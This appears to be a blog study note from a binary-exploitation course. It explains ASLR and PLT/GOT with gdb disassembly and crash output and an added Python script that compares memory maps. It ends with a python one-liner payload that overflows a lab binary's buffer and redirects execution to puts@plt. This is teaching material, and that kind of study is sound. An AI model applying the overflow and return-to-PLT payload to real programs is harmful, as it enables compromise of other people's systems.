5 DreamHack Linux Exploitation & Mitigation Part 2

1. ASLR

Address Space Layout Randomization (ASLR) is a protection technique that randomizes the addresses of the library, heap, stack and other regions every time the binary is executed, in order to block attacks such as RTL that rely on fixed addresses.

Unlike the NX bit, whose application is decided by the binary's compile options, whether ASLR is applied is decided by a configuration file on the server.

  • 0 : ASLR is not applied
  • 1 : stack and heap memory are randomized
  • 2 : stack, heap and library memory are randomized
(gdb) disas main
Dump of assembler code for function main:
   0x5655556d <+0>:	push   ebp
   0x5655556e <+1>:	mov    ebp,esp
   0x56555570 <+3>:	push   ebx
   0x56555571 <+4>:	sub    esp,0x20
   0x56555574 <+7>:	call   0x56555470 <__x86.get_pc_thunk.bx>
   0x56555579 <+12>:	add    ebx,0x1a5b
   0x5655557f <+18>:	mov    ecx,0x0
   0x56555584 <+23>:	mov    eax,0x20
   0x56555589 <+28>:	and    eax,0xfffffffc
   0x5655558c <+31>:	mov    edx,eax
   0x5655558e <+33>:	mov    eax,0x0
   0x56555593 <+38>:	mov    DWORD PTR [ebp+eax*1-0x24],ecx
   0x56555597 <+42>:	add    eax,0x4
   0x5655559a <+45>:	cmp    eax,edx
   0x5655559c <+47>:	jb     0x56555593 <main+38>
   0x5655559e <+49>:	lea    eax,[ebx-0x1974]
   0x565555a4 <+55>:	push   eax
   0x565555a5 <+56>:	call   0x565553f0 <puts@plt>
   0x565555aa <+61>:	add    esp,0x4
   0x565555ad <+64>:	lea    eax,[ebx-0x1967]
   0x565555b3 <+70>:	push   eax
   0x565555b4 <+71>:	call   0x565553f0 <puts@plt>
   0x565555b9 <+76>:	add    esp,0x4
   0x565555bc <+79>:	lea    eax,[ebp-0x24]
   0x565555bf <+82>:	push   eax
   0x565555c0 <+83>:	lea    eax,[ebx-0x195b]
   0x565555c6 <+89>:	push   eax
   0x565555c7 <+90>:	call   0x56555410 <__isoc99_scanf@plt>
   0x565555cc <+95>:	add    esp,0x8
   0x565555cf <+98>:	mov    eax,0x0
   0x565555d4 <+103>:	mov    ebx,DWORD PTR [ebp-0x4]
   0x565555d7 <+106>:	leave  
   0x565555d8 <+107>:	ret    
End of assembler dump.
(gdb) r
Starting program: /home/ubuntu/asm/example4 
Hello World!
Hello ASLR!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0xf7dfae00 in __libc_start_main () from /lib32/libc.so.6
(gdb) p/x $eip
$1 = 0xf7dfae00
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/asm/example4 
Hello World!
Hello ASLR!
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p/x $eip
$2 = 0x42424242
(gdb) 

As in the previous exercise, an additional 4 bytes have to be inserted.
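As an added example (not code from the DreamHack page), the Python below reads the ASLR sysctl and compares two /proc/<pid>/maps snapshots of the same binary to list which regions received a new base address between runs. The two snapshots are constructed to resemble the non-PIE example4 (they are not real captures); /proc/sys/kernel/randomize_va_space is the Linux sysctl the text refers to as the server configuration file.

```python
"""Which regions does ASLR move between two runs? (added example, not from the page)"""
import re
from typing import Dict, List

# One /proc/<pid>/maps line: start-end perms offset dev inode [path]
MAPS_LINE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>\S+)\s+\S+\s+\S+\s+\S+\s*(?P<path>.*)$"
)

def read_aslr_setting(path: str = "/proc/sys/kernel/randomize_va_space") -> int:
    """Return the sysctl value: 0 means ASLR is off, 1 and 2 enable it (real Linux path)."""
    with open(path) as f:
        return int(f.read().strip())

def parse_maps(text: str) -> Dict[str, int]:
    """Map each named region (file path, [heap], [stack]) to its lowest start address.
    Anonymous mappings without a name are skipped."""
    regions: Dict[str, int] = {}
    for line in text.splitlines():
        m = MAPS_LINE.match(line.strip())
        if not m or not m.group("path"):
            continue
        label, start = m.group("path"), int(m.group("start"), 16)
        regions[label] = min(start, regions.get(label, start))
    return regions

def moved_regions(run_a: str, run_b: str) -> List[str]:
    """Labels whose base address differs between two runs of the same binary.
    With ASLR on, stack/heap/libraries move; a non-PIE binary stays put."""
    a, b = parse_maps(run_a), parse_maps(run_b)
    return sorted(lbl for lbl in a.keys() & b.keys() if a[lbl] != b[lbl])

# Constructed snapshots (not real captures): same non-PIE binary, two separate runs.
RUN_A = """\
08048000-08049000 r-xp 00000000 08:01 1234  /home/ubuntu/dreamhack/example4
0804a000-0804b000 rw-p 00001000 08:01 1234  /home/ubuntu/dreamhack/example4
0804b000-0806c000 rw-p 00000000 00:00 0     [heap]
f7dd4000-f7fa9000 r-xp 00000000 08:01 5678  /lib32/libc.so.6
f7fa9000-f7fab000 rw-p 00000000 00:00 0
ffb0e000-ffb2f000 rw-p 00000000 00:00 0     [stack]
"""
RUN_B = """\
08048000-08049000 r-xp 00000000 08:01 1234  /home/ubuntu/dreamhack/example4
0804a000-0804b000 rw-p 00001000 08:01 1234  /home/ubuntu/dreamhack/example4
09a3c000-09a5d000 rw-p 00000000 00:00 0     [heap]
f7d61000-f7f36000 r-xp 00000000 08:01 5678  /lib32/libc.so.6
f7f36000-f7f38000 rw-p 00000000 00:00 0
ffd42000-ffd63000 rw-p 00000000 00:00 0     [stack]
"""

if __name__ == "__main__":
    print("moved between runs:", moved_regions(RUN_A, RUN_B))
```

On a live system, run the binary twice and feed `cat /proc/<pid>/maps` from each run into `moved_regions`; if the executable itself also shows up as moved, it was built as PIE.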

2. PLT, GOT Section

The PLT is at a fixed address.

(gdb) disas main
Dump of assembler code for function main:
   0x08048476 <+0>:	push   %ebp
   0x08048477 <+1>:	mov    %esp,%ebp
   0x08048479 <+3>:	push   %ebx
   0x0804847a <+4>:	sub    $0x20,%esp
   0x0804847d <+7>:	call   0x80483b0 <__x86.get_pc_thunk.bx>
   0x08048482 <+12>:	add    $0x1b7e,%ebx
   0x08048488 <+18>:	mov    $0x0,%ecx
   0x0804848d <+23>:	mov    $0x20,%eax
   0x08048492 <+28>:	and    $0xfffffffc,%eax
   0x08048495 <+31>:	mov    %eax,%edx
   0x08048497 <+33>:	mov    $0x0,%eax
   0x0804849c <+38>:	mov    %ecx,-0x24(%ebp,%eax,1)
   0x080484a0 <+42>:	add    $0x4,%eax
   0x080484a3 <+45>:	cmp    %edx,%eax
   0x080484a5 <+47>:	jb     0x804849c <main+38>
   0x080484a7 <+49>:	lea    -0x1a90(%ebx),%eax
   0x080484ad <+55>:	push   %eax
   0x080484ae <+56>:	call   0x8048320 <puts@plt>
   0x080484b3 <+61>:	add    $0x4,%esp
   0x080484b6 <+64>:	lea    -0x1a83(%ebx),%eax
   0x080484bc <+70>:	push   %eax
   0x080484bd <+71>:	call   0x8048320 <puts@plt>
   0x080484c2 <+76>:	add    $0x4,%esp
   0x080484c5 <+79>:	lea    -0x24(%ebp),%eax
   0x080484c8 <+82>:	push   %eax
   0x080484c9 <+83>:	lea    -0x1a77(%ebx),%eax
   0x080484cf <+89>:	push   %eax
   0x080484d0 <+90>:	call   0x8048340 <__isoc99_scanf@plt>
   0x080484d5 <+95>:	add    $0x8,%esp
   0x080484d8 <+98>:	mov    $0x0,%eax
   0x080484dd <+103>:	mov    -0x4(%ebp),%ebx
   0x080484e0 <+106>:	leave  
   0x080484e1 <+107>:	ret    
End of assembler dump.
(gdb) disas 0x8048320
Dump of assembler code for function puts@plt:
   0x08048320 <+0>:	jmp    *0x804a00c
   0x08048326 <+6>:	push   $0x0
   0x0804832b <+11>:	jmp    0x8048310
(gdb) x/wx 0x804a00c
0x804a00c:	0x08048326
  • puts@plt : 0x08048320
  • GOT (0x804a00c) : 0x08048326
(gdb) b *0x080484bd
Breakpoint 1 at 0x80484bd
(gdb) r
Starting program: /home/ubuntu/dreamhack/example4 
Hello World!

Breakpoint 1, 0x080484bd in main ()
(gdb) x/s $eax
0x804857d:	"Hello ASLR!"

ubuntu@ubuntu-virtual-machine:~/dreamhack$ (python -c 'print "A"*40 + "\x26\x83\x04\x08" + "BBBB" + "\x7f\x85\x04\x08"') | ./example4
Hello World!
Hello ASLR!
llo ASLR!

3. 32bit Return Oriented Programming


Posted 2020-08-31